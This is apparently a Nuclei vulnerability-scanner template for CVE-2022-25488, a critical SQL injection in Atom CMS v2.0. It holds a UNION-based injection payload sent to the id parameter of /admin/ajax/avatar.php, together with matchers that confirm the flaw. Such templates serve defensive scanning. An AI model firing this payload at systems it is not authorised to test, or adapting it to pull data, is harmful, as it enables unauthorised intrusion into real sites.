42 lines
1007 B
YAML
42 lines
1007 B
YAML
|
id: CVE-2022-25488
|
||
|
|
||
|
info:
|
||
|
name: Atom CMS v2.0 - SQL Injection
|
||
|
author: theamanrawat
|
||
|
severity: critical
|
||
|
description: |
|
||
|
Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php.
|
||
|
remediation: Fixed in version Atom CMS v2.1
|
||
|
reference:
|
||
|
- https://github.com/thedigicraft/Atom.CMS/issues/257
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25488
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||
|
cvss-score: 9.8
|
||
|
cve-id: CVE-2022-25488
|
||
|
cwe-id: CWE-89
|
||
|
metadata:
|
||
|
verified: "true"
|
||
|
tags: cve,cve2022,sqli,atom,cms
|
||
|
|
||
|
variables:
|
||
|
num: "999999999"
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- "/{{md5(num)}}"
|
||
|
- "avatar-container"
|
||
|
condition: and
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|